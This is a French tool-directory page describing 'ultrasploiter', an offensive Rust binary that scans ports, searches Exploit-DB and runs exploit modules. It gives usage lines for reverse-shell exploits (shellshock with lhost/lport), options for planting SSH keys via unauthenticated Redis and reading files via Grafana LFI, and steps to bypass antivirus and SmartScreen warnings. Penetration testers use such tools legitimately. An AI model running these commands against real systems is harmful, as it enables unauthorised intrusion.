Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ultrasploiter — Un binaire unique qui combine un scanner de ports, l'index complet d'Exploit-DB (47k entrées) et des modules d'exploitation exécutables en un seul outil. Écrit en Rust, fonctionne sous Linux, Windows et macOS. | Kitploit
Outils/GitLabGitLab/vqkro/ultrasploiter
Frameworks de Tests d'IntrusionReconnaissanceScanners de VulnérabilitésFrameworks d'ExploitationCartographie RéseauScan de PortsExploitationExploitation d'Applications WebCollecte d'InformationsCommandement et ContrôleRed Teaming
10il y a 13h 3mPas encore vérifié
Développement de Charges Utiles
GitLabvqkro/ultrasploiter

ultrasploiter

Un binaire unique qui combine un scanner de ports, l'index complet d'Exploit-DB (47k entrées) et des modules d'exploitation exécutables en un seul outil. Écrit en Rust, fonctionne sous Linux, Windows et macOS.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

UltraSploiter

scan, match, exploit — une IP en entrée, des shells en sortie.

Un binaire unique qui réunit un scanner de ports, l'index complet d'Exploit-DB et un ensemble de modules d'exploitation exécutables en un seul outil. Fonctionne sur Linux, Windows et macOS.

tâchenormalementici
Trouver des services sur un hôtenmapUltraSploiter scan <ip>
Rechercher des exploitssearchsploitUltraSploiter search <kw>
Les déclenchermsfconsoleUltraSploiter exploit <ip> <module>

Menu UltraSploiter


Installation

La méthode la plus simple et la meilleure est de récupérer le binaire précompilé et de l'exécuter. Rien à installer, aucune dépendance — un seul fichier autonome.

Téléchargez depuis la page Releases :

  • Windows — UltraSploiter-windows-x86_64.exe → double-clic
  • Linux — UltraSploiter-linux-x86_64
  • macOS — pas encore de binaire précompilé ; compilez-le en une commande (ci-dessous)

Attention : les outils de sécurité sont signalés. Windows SmartScreen et l'antivirus vous avertiront probablement ou mettront le binaire en quarantaine — cliquez sur Plus d'infos → Exécuter quand même, ou ajoutez une exclusion si vous comptez le garder.

Windows

Double-cliquez sur UltraSploiter.exe. Le menu s'ouvre.

Si SmartScreen vous avertit d'un éditeur inconnu (ce sera le cas pour tout binaire non signé), cliquez sur Plus d'infos → Exécuter quand même.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Si Gatekeeper le bloque (là encore, tout binaire non signé), faites soit un clic droit → Ouvrir, soit supprimez une fois le drapeau de quarantaine :

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

Compilation depuis les sources

Nécessaire uniquement s'il n'existe pas de binaire pour votre plateforme, ou si vous souhaitez le modifier. Rust 1.74+ est requis.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1 utilise la toolchain stable-x86_64-pc-windows-gnu, qui se lie avec MinGW — vous n'avez donc pas besoin de Visual Studio ni de MSVC. Il installe cette toolchain si elle est absente. Si vous disposez déjà des MSVC Build Tools, un simple cargo build --release fonctionne aussi.

Attention Windows + GNU : windows-sys (tiré par tokio) invoque dlltool, qui appelle l'assembleur as — et le composant rust-mingw ne fournit pas as. build.ps1 cherche un bin MinGW qui le contient dans %~dp0tools\mingw64\bin et %USERPROFILE%\tools\mingw64\bin, et le préfixe à PATH lorsqu'il le trouve. Déposez-y une build winlibs si vous rencontrez error calling dlltool. Les toolchains MSVC ne sont pas concernées.


Exécution

Sans argument, vous obtenez le menu :

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

Ligne de commande

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

Sous Linux/macOS, préfixez par ./ (par ex. ./UltraSploiter scan 10.0.0.5).

Options de scan

optionsignification
-p <spec>top (1000), 80,443, 1-1024, - (tous)
-T0..-T5modèle de timing — plus lent/discret à plus rapide/bruyant
-sUscan par sonde UDP
-sVdétection de service/version (activée par défaut)
--no-bannerignorer la récupération de bannière
--jsonJSON sur stdout
-oX <file>XML au format nmap

Le scanner est asynchrone (tokio) : chaque niveau -T définit combien de sockets sont en vol simultanément (jusqu'à 8000 à -T5), ce qui couvre le top-1000 de nmap en quelques secondes. Chaque « open » correspond à un handshake TCP complété, les résultats sont donc exacts.

Options (-o key=value)

cléutilisée parsignification
lhost, lportmodules rev-shelladresse de rappel
rportmodules webremplacer le port HTTP
pathshellshock, struts, phpunitchemin de l'endpoint
user, passtomcat_manageridentifiants du manager
coresolr_rcenom du core Solr
filegrafana_lfifichier à lire
ssh_pubkeyredis_unauthclé à déposer dans authorized_keys
src, dstproftpd_modcopycopie source / destination
timeouttousdélai d'attente socket en secondes

Base de données d'exploits

search et info s'appuient sur l'index complet d'Exploit-DB — plus de 47 000 entrées (le même jeu de données que celui utilisé par searchsploit), intégré au binaire. Lorsqu'une entrée porte un CVE qu'un module exécutable implémente, info relie les deux :

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

Modules exécutables (37)

Télécharger l’outil